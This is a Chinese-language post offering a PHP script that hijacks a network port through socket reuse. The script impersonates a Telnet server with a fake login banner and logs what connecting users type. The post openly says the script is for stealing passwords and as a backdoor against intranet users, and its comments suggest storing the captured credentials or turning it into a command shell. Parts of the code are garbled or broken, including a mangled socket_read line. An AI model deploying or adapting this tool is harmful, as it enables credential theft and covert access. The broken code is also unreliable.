PHP下實現連接埠複用/劫持_PHP

假如監聽127.0.0.1 ,訪問共網IP不受影響，假如監聽公網IP，127。0。0。1等IP不受影響。
這個可以用於欺騙使用者密碼，因為原來的服務不可用了。或者留成針對內網使用者的後門。
最後歡迎加MSN：CQXY[AT]21CN。NET賜教。
#!/usr/bin/php -q
#c0dz by Darkness[BST]
#Team:www.bugkidz.org
#E-mail:cqxy[at]21cn.net
if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
{
echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21\r\n";
echo "c0dz By Darkness[BST]";
exit;
}
error_reporting(E_ALL);

set_time_limit(0);

ob_implicit_flush();

$host = $argv[1];
$port = $argv[2];
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
} /*建立SOCKET*/
socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*設定SOCKET串連的屬性為SO_REUSEADDR,這樣才可以連接埠複用*/
if (($ret = socket_bind($sock, $host, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}/*綁定連接埠*/

if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
} /*開始監聽*/

while(true) {

if (($sniffer = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "\n";
break;
}
if ($port == 23)
{
$txt = "Welcome to the Telnet Server\r\n";
$txt .="User:\r\n";
socket_write($sniffer, $txt, strlen($txt));
} /*這裡是偽裝資訊，把自己偽裝成原來的TELNET伺服器，這樣來騙取密碼*/

while(true) {

if(($buf _read($sniffer">=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
{

break;

}

if (!$buf = trim($buf)) {
continue;
}

if ($buf == '!quit') {
break;
}
if ($buf == '!shutdown') {
socket_close($sniffer);
break 2; /*其實這裡可以調用system()，搞成一個CMD後門，反正你想怎麼改都可以*/
}

$sniff_data = "$buf\r\n";

/* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
echo $sniff_data;
/*輸出字串,這裡可以加進檔案處理,儲存密碼什麼的*/
}
socket_close($sniffer);

}
socket_close($resock);
socket_close($sock);
?>

